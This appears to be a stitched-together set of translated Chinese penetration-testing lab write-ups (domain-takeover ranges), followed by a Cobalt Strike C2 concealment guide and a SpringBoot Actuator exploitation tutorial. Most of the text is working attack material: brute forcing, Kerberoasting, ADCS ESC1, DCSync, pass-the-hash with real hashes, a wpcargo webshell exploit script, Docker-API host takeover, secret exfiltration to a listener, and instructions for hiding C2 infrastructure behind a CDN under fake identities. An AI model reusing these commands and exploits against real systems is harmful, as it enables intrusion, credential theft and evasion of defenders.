open 172.22.9.7:139 open 172.22.9.26:135 open 172.22.9.13:139 open 172.22.9.13:135 open 172.22.9.7:135 open 172.22.9.26:80 open 172.22.9.47:80 open 172.22.9.19:80 open 172.22.9.47:22 open 172.22.9.47:21 open 172.22.9.19:22 open 172.22.9.7:88 open 172.22.9.19:8983 open [+] NetInfo: [*]172.22.9.13 [-]CA01 [-]172.22.9.13 [*] 172.22.9.7 [+]DC XIAORANG\XIAORANG-DC [*] 172.22.9.26 XIAORANG\DESKTOP-CBKTVMO [+] NetInfo: [*]172.22.9.26 [-]DESKTOP-CBKTVMO [-]172.22.9.26 [+] NetInfo: [*]172.22.9.7 [-]XIAORANG-DC [-]172.22.9.7 [*] 172.22.9.13 XIAORANG\CA01 [*] WebTitle:http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works [*] WebTitle:http://172.22.9.19 code:200 len:612 title:Welcome to nginx! [*] 172.22.9.47 WORKGROUP\FILESERVER Windows 6.1 [*] 172.22.9.47 (Windows 6.1) [*] WebTitle:http://172.22.9.19:8983 code:302 len:0 title:None Jump url: http://172.22.9.19:8983/solr/ [*] WebTitle:http://172.22.9.26 code:200 len:703 title:IIS Windows Server [*] WebTitle:http://172.22.9.19:8983/solr/code:200 len:16555 title:Solr Admin discovered the following assets 172.22.9.19 Entrance IP 172.22.9.7 DC 172.22.9.26 Domain Members 172.22.9.47 File Server 172.22.9.13 CA According to the prompt, the file server should have smb sharing to further collect information Note: Fscan does not scan Smb's shared mode, so you can use nmap to scan sudo grc --pty nmap -sT -A 172.22.9.47 Use smbclient to connect to share proxychains smbclient \\\\172.22.9.47\\fileshare dir get personnel.db get secret\flag02.txt Get falg02, and there is another prompt you have enumerated smb. But do you know what an SPN is? The third flag There are several user names and passwords in the database file rdp crack proxychains hydra -L user.txt -P pwd.txt 172.22.9.26 rdp -vV -e ns Obtained two accounts, but cannot log in remotely Kerberost Attack Use GetUserSPNs.py to find SPNs registered under domain users proxychains python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian hash offline cracking, very fast, 1.txt is the hash value, rockyou.txt is the password book that comes with kali hashcat64.exe -m 13100 1.txt rockyou.txt Get zhangxia/MyPass2@@6, use the account password to log in remotely Note that because it is a domain account, the user name is [email protected]. After logging in, you cannot directly access the administrator directory to find flags because it is not an administrator's permission. ADCS ESC1 Use Certify.exe to locate vulnerabilities Certify.exe find /vulnerable ESC1 utilization prerequisites: msPKI-Certificates-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT Indicates that users who apply for a new certificate based on this certificate template can apply for a certificate for other users, i.e. any user, including the domain administrator user PkiExtendedKeyUsage: Client Authentication Indicates that the certificate generated based on this certificate template can be used to authenticate computers in Active Directory Enrollment Rights: NT Authority\Authenticated Users Indicates that any authenticated user in Active Directory is allowed to request new certificates generated based on this certificate template Apply for a certificate for the domain management Certify.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:'XR Manager' /altname:XIAORANG.LAB\Administrator Convert format openssl pkcs12 -in cert.pem -keyex -CSP 'Microsoft Enhanced Cryptographic Provider v1.0' -export -out cert.pfx request TGT, PTT Because there is no password entered when exporting the certificate to convert, just leave the password blank here Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password: /ptt Export the hash after obtaining the tickets from the domain manager mimikatz.exe 'lsadump:dcsync /domain:xiaorang.lab /user:Administrator' exit Hash pass PTH 172.22.9.26 proxychains crackmapexec smb 172.22.9.26 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x 'type Users\Administrator\flag\flag03.txt' The fourth flag PTH DC proxychains python3 wmiexec.py -hashes 0000000000000000000000000000000000000000000000000:2f1b57eefb2d152196836b0516abea80 [email protected] Original link: https://zhuanlan.zhihu.com/p/581487685

Instructions Unauthorized is a shooting range environment with medium difficulty. Completing this challenge can help players understand the technical methods of proxy forwarding, intranet scanning, information collection, privilege escalation and lateral movement in intranet penetration, strengthen their understanding of the core authentication mechanism of the domain environment, and master some interesting technical points in the domain environment penetration. There are 3 flags in the shooting range, distributed in different target machines. Technology FTP, Privilege Elevation, AD CS, Kerberos, Domain Penetration First flag docker not authorized Collected through external network information, it was found that docker was not authorized https://cloud.tencent.com/developer/article/1744943 View the mirror docker -H tcp://47.92.7.138:2375 images View container docker -H tcp://47.92.7.138:2375 ps -a Start the container and mount the host disk to /mnt docker -H tcp://47.92.7.138:2375 run -it -v /:/mnt --entrypoint /bin/bash ubuntu:18.04 Write the public key Generate a key on vps. After pressing Enter, there will be 3 interactions. The first one is the file name, which is id_rsa by default. If you need to modify it, enter a file name yourself. The second and third are passwords and confirmation passwords, which are the passwords to be entered when using the public key in the future. They are generally not set. If there are strong security needs, you can set them yourself. Finally, two files id_rsa, id_rsa.pub will be generated. The ending of .pub is the public key and the other is the private key ssh-keygen -t rsa Write the public key to the /root/.ssh/authorized_keys file of the target machine host cd /mnt/root/.ssh/ echo 'ssh-rsa AAAAB3NzaC1yc2..' authorized_keys You can log in to ssh directly with the private key locally Look up the flag, prompting that the flag is not here mysql weak password View the open port of this machine netstat -aptn Check the historical command and find that the mysql password is 123456. In fact, it can also be blasted. history Access mysql database mysql -uroot -p123456 mysql show databases; mysql use secret; mysql show tables; mysql select * from f1agggg01 gets the first flag ‍Second flag Handalone penetration Upload npc settings proxy, fscan scan 172.22.7.0/24 172.22.7.67:8081 open 172.22.7.13:80 open 172.22.7.13:22 open 172.22.7.67:445 open 172.22.7.31:445 open 172.22.7.67:21 open 172.22.7.6:445 open 172.22.7.67:80 open 172.22.7.67:139 open 172.22.7.31:139 open 172.22.7.6:139 open 172.22.7.31:135 open 172.22.7.67:135 open 172.22.7.6:135 open 172.22.7.6:88 open 172.22.7.13:2375 open [+] NetInfo: [*]172.22.7.6 [-]DC02 [-]172.22.7.6 [*] 172.22.7.67 XIAORANG\WIN-9BMCSG0S [*] WebTitle:http://172.22.7.13 code:200 len:27170 title:XX Decoration [+] NetInfo: [*]172.22.7.67 [-]WIN-9BMCSG0S [-]172.22.7.67 [+] NetInfo: [*]172.22.7.31 [-]ADCS [-]172.22.7.31 [*] 172.22.7.31 XIAORANG\ADCS [*] 172.22.7.6 [+]DC XIAORANG\DC02 [*] WebTitle:http://172.22.7.13:2375 code:404 len:29 title:None [+] ftp://172.22.7.67:21:anonymous [-]1-1P3201024310-L.zip [-]1-1P320102603C1.zip [-]1-1P320102609447.zip [-]1-1P320102615Q3.zip [-]1-1P320102621J7.zip [-]1-1P320102J30-L.zip [*] WebTitle:http://172.22.7.67 code:200 len:703 title:IIS Windows Server [*] WebTitle:http://172.22.7.67:8081 code:200 len:4621 title3: Company management backend [+] http://172.22.7.13:2375 poc-yaml-docker-api-unauthorized-rce [+] http://172.22.7.67:8081/www.zip poc-yaml-backup-file [+] http://172.22.7.13:2375 poc-yaml-go-pprof-leak FTP not authorized http://172.22.7.67:8081/www.zip backup compressed package. After decompression, it was found that the download folder is consistent with the shared file of the ftp logged in anonymously Therefore, webshell can be uploaded through ftp shell address http://172.22.7.67:8081/download/shell.asp Directly use potatoes to increase rights and upload SweetPotato.exe SweetPotato.exe -a 'whoami' After testing, 3389 is enabled. Add an account directly and log in SweetPotato.exe -a 'net user devyn Admin@123 /add' SweetPotato.exe -a 'net localgroup administrators devyn /add' Get flag ‍The third flag Note that this newly created user cannot execute the domain command, so you need to query the domain account and then log in with PTH. If you find the password, you can log in directly. In fact, you can directly execute mimikatz in the shell to grab the Hash. The remote desktop here is more convenient to use cmd to execute. Crawled the domain account zhangfeng/FenzGTaVF6En, log in again with the domain account, note that the user name must be filled in [email protected] shadow-credentials https://wiki.whoamianony.top/active-directory-methodology/shadow-credentials The following accounts have write permissions to the msDS-KeyCredentialLink property: Domain Administrator Accounts Key Admins Group Accounts Enterprise Key Admins Group Accounts with GenericAll or GenericWrite permissions to objects in Active Directory Machine accounts have write permissions to their msDS-KeyCredentialLink property zhangfeng Accounts In the Key Admins group, have write permissions Add Shadow Credentials to the msDS-KeyCredentialLink property of the domain controller Whisker.exe add /target:DC02$ /domain:xiaorang.lab /dc:DC02.xiaorang.lab After the addition is successful, the program prompts the command to request the TGT ticket based on the certificate authentication. Note that the prompt command is added to /ptt at the end Domain controller account has privileges, and can use Mimikatz to execute DCSync to export domain hash mimikatz.exe 'privilege:debug' 'lsadump:dcsync /domain:xiaorang.lab /user:Administrator' exit Hash pass proxychains python3 wmiexec.py -hashes 00000000000000000000000000000000:bf967c5a0f7256e2eaba589fbd29a382 [email protected] Original link: https://zhuanlan.zhihu.com/p/581451146

Instructions Brute4Road is a shooting range environment with medium difficulty. Completing this challenge can help players understand the technical methods of proxy forwarding, intranet scanning, information collection, privilege escalation and horizontal movement in intranet penetration, strengthen their understanding of the core authentication mechanism of the domain environment, and master some interesting technical points in the domain environment penetration. There are 4 flags in the shooting range, distributed in different target machines. Technology Redis, Brute Force, SMB, Privilege Elevation, Domain Penetration First flag redis master-slave copy RCE fscan scan the entrance ip. If the following entrance ip changes, it is because of the restart environment, there is no problem with the process. Unauthorized redis was found, and the write plan task rebounded shell was tested. It prompted that there was no permission. The redis master-slave copy RCE successfully suid escalation The user needs to raise the rights for redis. Use suid to raise the rights. You can execute the following command. For details, you can view suid to raise the rights for Linux system 1 find/-user root -perm -4000 -print 2/dev/null find/-perm -u=s -type f 2/dev/null find/-user root -perm -4000 -exec ls -ldb {} ;base64 has suid permission. We can read the local file through base64 and output it to get the first flag base64 '/home/redis/flag/flag01' | base64 --decode The second flag wpcargo unauthorized RCE Set up a proxy on the server of the portal IP, and perform intranet scanning, upload npc and fscan through weget start ping (icmp) Target 172.22.2.18 is alive (icmp) Target 172.22.2.34 is alive (icmp) Target 172.22.2.3 is alive (icmp) Target 172.22.2.7 is alive (icmp) Target 172.22.2.16 is alive [*] Icmp alive hosts len is: 5 172.22.2.16:445 open 172.22.2.34:445 open 172.22.2.3:445 open 172.22.2.18:445 open 172.22.2.16:139 open 172.22.2.34:139 open 172.22.2.3:139 open 172.22.2.34:135 open 172.22.2.16:135 open 172.22.2.18:139 open 172.22.2.3:135 open 172.22.2.16:80 open 172.22.2.3:88 open 172.22.2.18:22 open 172.22.2.7:80 open 172.22.2.7:22 open 172.22.2.7:6379 open 172.22.2.16:1433 open 172.22.2.7:21 open 172.22.2.18:80 open [*] alive ports len is: 20 start vulscan [+] NetInfo: [*]172.22.2.16 [-]MSSQLSERVER [-]172.22.2.16 [*] 172.22.2.34 XIAORANG\CLIENT01 [*] 172.22.2.16 (Windows Server 2016 Datacenter 14393) [+] NetInfo: [*]172.22.2.3 [-]DC [-]172.22.2.3 [*] WebTitle:http://172.22.2.16 code:404 len:315 title:Not Found [+] NetInfo: [*]172.22.2.34 [-]CLIENT01 [-]172.22.2.34 [*] WebTitle:http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS [*] 172.22.2.16 XIAORANG\MSSQLSERVER Windows Server 2016 Datacenter 14393 [*] 172.22.2.3 [+]DC XIAORANG\DC Windows Server 2016 Datacenter 14393 [*] 172.22.2.18 WORKGROUP\UBUNTU-WEB02 [*] 172.22.2.3 (Windows Server 2016 Datacenter 14393) [+] ftp://172.22.2.7:21:anonymous [-]pub [*] WebTitle:http://172.22.2.18 code:200 len:57738 title: Another WordPress site uses wpscan to scan the wordpress site proxychains wpscan --url http://172.22.2.18 You can see that there is a wpcargo plug-in, search for related vulnerabilities, and there is an unauthorized RCE vulnerability https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a import sys import binascii import requests # This is a magic string that when treated as pixels and compressed using the png # algorithm, will cause ?=$_GET[1]($_POST[2]); to be written to the png file payload='2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50' def encode_character_code(c: int): return '{:08b}'.format(c).replace('0', 'x') text=''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:] destination_url='http://172.22.2.18/' cmd='ls' # With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels. requests.get( f'{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}sizefactor=.09090909090909size=1filepath=/var/www/html/webshell.php' ) # We have uploaded a webshell - now let's use it to execute a command. print(requests.post( f'{destination_url}webshell.php?1=system', data={'2': cmd} ).content.decode('ascii', 'ignore')) generates shell http://172.22.2.18/webshell.php?1=system POST:2=whoami Connect to the ant sword, pay attention to the type and choose cmdLinux (This wastes a lot of time and is not familiar with the tools) View the database configuration and connect Find the second flag The third flag A table for storing passwords MSSqlServer RCE Use the password table you just got in the database to blast MsSQL and get the password ElGNkOiC Connect using the Multiple.Database.Utilization.Tools tool First activate the Ole Automation Procedures component, then upload SweetPotato.exe to increase the authority, and obtain system permissions C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a 'netstat -ano' Discover 3389 is open, directly add users, remote connection net user devyn Admin123 /add net localgroup administrators devyn /add Remote connection is successful Get the third flag ‍The fourth flag Domain Penetration Using mimikatz, crawl the hash of the domain user The hash obtained from the domain user is 78a2811aabd779d0da3cef84903ca3e6 Constrained delegation attacks The MSSQLSERVER machine is configured with binding delegation to DC LDAP and CIFS services First apply for TGT of the machine account MSSQLSERVER through Rubeus. After execution, you will get the Base64 encrypted TGT ticket. Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:78a2811aabd779d0da3cef84903ca3e6 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap Then use the S4U2Self extension to represent the domain administrator Administrator to request tickets for the domain control LDAP service and pass the resulting tickets to memory Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:LDAP/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3jomeuPBK3C69yaGuyDCLGYHRyVjZg4zXrEwUSwvFS0kZ+4Q2uTcKGqYw3GLs5sf0/MJ0fHiL1V 8u5WrLpgR5hBlYUGN+g1zmv3uiTXO7QobxH0lR0dUUKuNdPoxdPdx26Liz5/xdDFvz4xTyMKDqqRxgBWquqGjh1cp/woy4U4tXJo+L8CfQ424Kgdb3n/rJYRNY54m8QHl/smHg3PpMgTT2FEiJ5Jag+qDpM/R/XUOIJHNzSfCVi2XiLGqPF374jUbih9UTZvlqRoSHz9qljZlBsEAqen9ctu01tmNn4ACRz4mqMV11MyV9scfe JnQbCpGdS+zveSrT53dwFotrg00o4Jq6RGr9dR/6ZMKC1W/kfwSXdF1b/H3HOMM7HzK0qLfSbDtq8i1e2FdZ5kyOVbbtAE6irAizzK7ScDS4rO9RRSDl6BNaV25nkjce6j9dj4V56ua1Gh+F+JQfAHbE8zLNt9OmseJs6IGj/cxKEckbhcggGhQhL3c6k1FKZOTXY1PKR8zweZauWgK7FXiDLEP1h6YwP2S/frDmKRb5mCdBU UQBzsA/6BBmEAnxvfKX1B8xViT0rq1I/pLKS9LKWTKyuHJd67z6XDRN7IWR0fstyqGuvHPn391l02zNUJRK5/7jyOyKwhQ3sb/XRzC4YbLeGgImMGRZ0fqrQ+hRBQbTuNr2/i4hgyWDLuBSEvz5qb1kXcebRkWuCHhpGKtsdbyZ30tnpA0W2qWu8qJ8zKks04r2Hj91lCPudAbrjhjjFf/UNd+fHcfYlAu0xzMuR8eKUA22Lcv 0fEf2igvIu38bCRvUjfGkh423fgPsR4Xom8/8lNWhU+kaAiGSwSER8UGr8jiDVjtmgF5ScFoQDM+kVJ5o0ZnettUHJhcVMAdlI1QTq5WjQRIea6u4d6bYSHI43ips6So8hEcsB/03FpOKR/SRUYveALw3IAwAJtAPtW/SrzUeLXEemVg2aADTl1qXNw04A0e9v8XQnnm7lyCJfmI3pXJVsycjJyviDwazFtHGbQoM3fhlZ4zp BlfBKagxQr624YO5yIaJbl9/Dp4M7iauUIbo7kAWCfka1iafKyGDFGAXudAb52dt72jw0/QpeLP08RORDLtY8IrpjKAzHsSGuVYukY07lR+ck95MeKFDnl8cwaKw0MB8f92n4g4OfWQbUJK/479LYMZBDG38iwHHv/MLiaCylHm5nazaY0JJxJ2CeqIvsAFlfm7gp23V5Hj/T+eKt0zd3EIjNhuwBvhYeVKKQCFJZGaRelQKxa ptmKhhgILA+wTKvCxpQX6qx8b40pg9r1rr4zQ9buPb4JNnqwHe5SIgPURR02Xv5FUiiI9Qc5//bUhxCEOXi0TFASRbghAyNA/TLRVAqfvtgqv6SKb4jw265bdrQQrPITm1En79jsNw6adH1curFJr++PS6ZYX6yqK3DlJ5Piiy2OAVLPIPcN1zmbZ+jgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6 ESBBBAXgLFznI5hHEOCpAjFdNEoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIyMTAyODEyMjIzM1qmERgPMjAyMjEwMjgyMjIyMzNapxEYDzIwMjIxMTA0MTIyMjMzWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg== The LDAP service has DCSync permissions to export the Hash of users in the domain mimikatz.exe 'lsadump:dcsync /domain:xiaorang.lab /user:Administrator' exit Get domain administrator hash 1a19251fbd935969832616366ae3fe62 WMI horizontal After obtaining the hash of the domain management, we can log in to the domain control through the WMI service. python wmiexec.py -hashes 00000000000000000000000000000000000000000000:1a19251fbd935969832616366ae3fe62 [email protected] Get the fourth flag Another method You can get the domain control directly by hashing. Here you use crackmapexec to perform PTH proxychains crackmapexec smb 172.22.2.3 -u administrator -H1a19251fbd935969832616366ae3fe62 -d xiaorang.lab -x 'type Users\Administrator\flag\flag04.txt' Original link: https://zhuanlan.zhihu.com/p/581577873

0x1 Info Tag: MSSQL, Privilege Escalation, Kerberos, Domain Penetration, RDP Range address: https://yunjing.icunqiu.com/ranking/summary?id=BzMFNFpvUDU 0x2 Recon Target external ip47.92.82.196nmap MSSQL Weak password blasting, valid credentials are blasting, and the permission is service account permission (MSSQLSERVER) sa:1qaz!QAZ 0x3 Entry Point MSSQL - 172.22.8.18 Preface, this machine is not directly in the domain MSSQL shell (I forgot to take a screenshot here.) escalation of power, here we directly obtain Clsid violently criticized potato (the first few clsids are not used) Modify GetClsid.ps1, add execution potato Potato and GetClsid.ps1 Execute GetClsid.ps1 Obtain valid clsid and command execution results Export SAM, SYSTEM, Security Resolve the credentials, use administrator + psexec 139 horizontally (the external network does not open 445) to obtain flag01administrator 2caf35bb4c5059a3d50599844e2b9b1f qwinsta and port connection to see a machine rdp coming Use administrator psexec to go msf (system permission), use incognito module, simulate to john (I tested that only msf's incognito can complete the subsequent operations, and other simulation token tools such as f-secure lab failed) Use john's token to execute net use See \\tsclient\C Share to directly obtain the credential.txt below \\tsclient\C, and prompt hijack image (mirror hijacking)xiaorang.lab\Aldrich:Ald@rLMWuy7Z!# Fast forward, skip the CME scan of the agent construction process 172.22.8.0/24, three machines prompt that the password has expired. Test whether the DC01 port 88 is enabled (test whether the domain control is domain control), DC01 is domain control smbpasswd.py Remotely modify the expired password and change it to 111qqq.ldapshell.py Verification, the login domain is successful CME Enumeration RDP, showing that you can log in and enter 172.22.8.46 (use the official CME RDP module, you will not scan out valid RDP credentials. I wrote a CME module based on xfreerdp) XiaoliChan/CrackMapExec-Extension 0x4 Domain Penetration - Entrance - 172.22.8.46 Log in and view xiaorang.lab\Aldrich is not the administrator of this machine, but just an ordinary user to increase the authority. Two methods Priv-ESC1: Mirror Hijacking Elevation (General) Get-ACL can write to the registry 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options' and create the operation Create a registry that hijacks magnify.exe (magnifying glass) and execute CMD.exe Lock the user Click the magnifying glass Elevate authority to system Priv-ESC2: krbrelayup's escalation Domain ordinary permission users take the machine in the domain directly (unconventional, recommended) Fast forward mimikatz and get the machine account of the current machine win2016$xiaorang.lab\WIN2016$ 4ba974f170ab0fe1a8a1eb0ed8f6fe1a 0x5 Domain Penetration - DC Takeover Two methods observe the group relationship of WIN2016$ and find that it is in the Domain Admins group. Use Dcsync to directly take away DC01 (the process is omitted) Constrained delegation (unconventional) Bloodhound collects domain information, analyzes, and finds that there is a constraint delegation Constrained delegation attacks using getST.py Take away DC01 Original link: https://www.freebuf.com/articles/system/352237.html

Tool Preparation A foreign server Free Whale (VPN) CS 4.4 nginx CS Server Configuration Server ping is disabled 1. When the server ping is disabled, it can be determined from a certain perspective that the host is inactive. 2. Edit the file /etc/sysctl.conf and add a line to it. net.ipv4.icmp_echo_ignore_all=1 Then the mission command sysctl -p makes the configuration take effect. vim /etc/sysctl.conf net.ipv4.icmp_echo_ignore_all=1 sysctl -p 3. After that, the ping will not be able to ping. In this way, nmap can still scan the server to survive. Modify port 1. Edit the teamserver file, search for 50050, and change it to any port, here it is changed to 65000 vim teamserver 2. Save and exit, start teamserver, and find that the port has changed. ./teamserver xx.xx.xx.xx xiao Modify the default certificate 1. Because the certificate generated by the cs server contains all the relevant characteristics of cs, it is modified and replaced here. There are two ways to modify it, namely, generate a keystore and modify the startup file. No matter which way, you need to delete the original file cobaltstrike.store. Method 1 Delete the keystore file cobaltstrike.store (recommended) 1. Generate a new keystore file keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu -dname 'CN=baidu.com, OU=service operation department, O=Beijing Baidu Netcom Science Technology Co.\, Ltd, L=beijing, S=beijing, C=CN' keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12 2. Check the certificate keytool -list -keystore cobaltstrike.store 3. Start the server to check whether the certificate signature is the same, and the certificate signature is the same after checking. Method 2 Modify the startup file 1. Teamserver is the startup file that starts the CSS server. There is an environment detection part, including the detection of the keystore. The way to write this part is that if the keystore cannot be detected, use the command to generate a new keystore and modify the generated command here. 2. The part circled in the teamserver needs to be modified 3. Modify it to the following content: keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu -dname 'CN=baidu.com, OU=service operation department, O=Beijing Baidu Netcom Science Technology Co.\, Ltd, L=beijing, S=beijing, C=CN' 4. Delete the original ./cobaltstrike.store keystore file, and the next time it starts, a new keystore file will be automatically generated. rm -rf cobaltstrike.store Hide with CDN Apply for a free domain name 1. Enter the freenom official website, translate Chinese, pull to the bottom, and select the developer. 2. Pull to the bottom and click today to get a random domain account 3. Enter the international email address and click Verify the email address. It is recommended to use a temporary email address. 4. After a few seconds, you will receive an email. Click on the email and click on confirmation to jump to the freenom website. After translating the current web page, click on the developer. 5. Pull the website to the end, translate Chinese, and click to get a random domain account immediately. 6. Then come to the personal information filling page 7. Because the address selected by the IP is Florida, it is necessary to use the Florida personal information generator and personal information generator, and the two need to be combined. 8. Just fill in the information according to the generator. After filling in it, check and click to complete the order. The account has been registered successfully. 9. Return to the homepage of the website, select the domain name, enter xxx.tk, click check availability, and if available, click checkout. 10. Select the 12-month free version and finally click continue. 11. Final order 12. Select my domains and see that the domain name is alive. CDN configuration 1. There are actually quite a lot of options for cdn part. I chose cloudflare here 2. After logging in to cloudflare, select Add Site 3. Choose a free plan 4. Add DNS records and enter the IP and A records to be protected. 5. Modify the dns server of xxx.tk to cloudflare. It takes a certain amount of time to take effect after the modification is completed 6. Turn off automatic https rewrite and always use https and broti compression 7. Click finish 8. The following interface appears and the settings take effect. You can use cloudflare to perform domain name resolution operation. 9. Analyze a www.xxx.tk to test it 10. Using Global Ping, I found that CDN has been successfully added 11. Configure SSL/TLS encryption mode to complete cloudflare generates certificate 1. Find SSL/TLS-source server-create the certificate on the dash page of cloudflare, and then save the public and private keys, namely server.pem and server.key, respectively. It must be saved during generation, otherwise the private key may not be found. 2. Apply for a certificate and package the keystore, package the certificate and generate the store file. openssl pkcs12 -export -in server.pem -inkey server.key -out www.xxx.tk.p12 -name www.xxx.tk -passout pass:123456 //Use keytool to generate certificate pairs in cs available store format keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore www.xxx.tk.store -srckeystore www.xxx.tk.p12 -srcstoretype PKCS12 -srcstorepass 123456 -alias www.xxx.tk 3. Configure the certificate to the https listening method. If you want to use the certificate we applied for, you need to use the ‘Malleable C2 profile’ method to operate. Here we take cloudflare.profile as an example. Put the generated key file.store in the cs directory and want to add cloudflare.profile to the certificate configuration: What you need to note is that https-certificate is a certificate-related configuration. The Host value in other client.header should be the domain name we applied for, and the other parts should be configured according to personal circumstances. //Copy the store certificate generated above to the teamserver directory cp ./www.xxx.tk.store /opt/cs44/ //Create cloudflare.profile file vim cloudflare.profile //cloudflare.profile file content https-certificate { set keystore 'www.xxx.tk.store'; set password '123456'; } http-stager { set uri_x86 '/api/1'; set uri_x64 '/api/2'; client { header 'Host' 'www.xxx.tk';} server { output{ print; } } } http-get { set uri '/api/3'; client { header 'Host' 'www.xxx.tk'; metadata { base64; header 'Cookie'; } } server { output{ print; } } } http-post { set uri '/api/4'; client { header 'Host' 'www.xxx.tk'; id { uri-append; } output{ print; } } server { output{ print; } } }4. Verify that there is any problem with the configuration file. The following is the configuration for verification successfully (the current directory needs to have cobaltstrike.jar) //Create a new c2lint file vim c2lint //c2lint file content java -XX:ParallelGCThreads=4 -XX:+UseParallelGC -classpath ./cobaltstrike.jar c2profile.Lint $1 //Verify if there is any problem with the configuration file ./c2lint cloudflare.profile

1. SpringBoot env to obtain * sensitive information When we directly access the springboot site, we can see that some password fields are filled with * Clear text fields can be obtained through ${name} 2. Inappropriate configuration leads to leakage of sensitive information (password calls asterisk, while pwd does not call asterisk) Reference https://mp.weixin.qq.com/s/HmGEYRcf1hSVw9Uu9XHGsA Specific implementation process : For example, we want to get the pid parameter value 'PID': '10648', POST /env HTTP/1.1 Host: 10.20.24.191:8090 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 76 eureka.client.serviceUrl.defaultZone=http://${PID}@10.20.24.191:2444/ Then post refresh any content, trigger the vulnerability Ps: generally needs to wait for 3 seconds to have a response package. If the return immediately may be due to the lack of spring-boot-starter-actuator extension package that cannot be refreshed, it cannot be exploited. POST /refresh HTTP/1.1 Host: 10.20.24.191:8090 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 5 12312 When the server nc listens to port 2444, it is received root@kali:/tmp# nc -lvvp 2444 listening on [any] 2444 . connect to [10.20.24.191] from kali [10.20.24.191] 40960 GET /xstream/apps/HTTP/1.1 Accept: application/json DiscoveryIdentity-Name: DefaultClient DiscoveryIdentity-Version: 1.4 DiscoveryIdentity-Id: 10.20.24.191 Accept-Encoding: gzip Host: 10.20.24.191:2444 Connection: Keep-Alive User-Agent: Java-EurekaClient/v1.4.11 Authorization: Basic MzgzNDY6bnVsbA== Authorization: Basic MzgzNDY6bnVsbA== base64 decoding to obtain root@kali:/tmp# echo MzgzNDY6bnVsbA==|base64 -d 38346:null Same as the pid information above Similarly, get user.country parameters, the steps are the same Results : root@kali:/tmp# nc -lvvp 2555 listening on [any] 2555 . connect to [10.20.24.191] from kali [10.20.24.191] 38994 GET /xstream/apps/HTTP/1.1 Accept: application/json DiscoveryIdentity-Name: DefaultClient DiscoveryIdentity-Version: 1.4 DiscoveryIdentity-Id: 10.20.24.191 Accept-Encoding: gzip Host: 10.20.24.191:2555 Connection: Keep-Alive User-Agent: Java-EurekaClient/v1.4.11 Authorization: Basic VVM6bnVsbA== sent 0, rcvd 310 base64 decoding to obtain root@kali:/tmp# echo VVM6bnVsbA==|base64 -d US: null scripting: Enter the parameters to be queried, enter the port to be listened to by nc Listen to the port, get the specified header header, automatically base64 decryption Ps: If you are lucky enough to have Eureka-Client 1.8.7 in the target classpath (usually included in Spring Cloud Netflix), you can exploit the XStream deserialization vulnerability in it. For example,User-Agent: Java-EurekaClient/v1.4.11 2. SpringBoot_Actuator JNDI RCE 1. Environment construction git clone https://github.com/veracode-research/actuator-testbed start up mvn install or mvn spring-boot:run Through compilation and operation, I found that the listening IP address is 127.0.0.1, and can only be accessed by local machine. Baidu search, just change it to 0.0.0.0. Find key files grep -r 'server.address' -n ./ ./src/main/resources/application.properties:2:server.address=127.0.0.1 ./target/classes/application.properties:2:server.address=127.0.0.1 Change to server.port=8090 server.address=0.0.0.0 # vulnerable configuration set 0: spring boot 1.0 - 1.4 # all spring boot versions 1.0 - 1.4 expose actors by default without any parameters # no configuration required to expose them # safe configuration set 0: spring boot 1.0 - 1.4 #management.security.enabled=true # vulnerable configuration set 1: spring boot 1.5+ # spring boot 1.5+ requires management.security.enabled=false to expose sensitive actors #management.security.enabled=false # safe configuration set 1: spring boot 1.5+ # when 'management.security.enabled=false' but all sensitive actors explicitly disabled #management.security.enabled=false # vulnerable configuration set 2: spring boot 2+ #management.endpoints.web.exposure.include=* 2. Restart and start mvn spring-boot:run or /opt/jdk1.8.0_60//bin/java -classpath 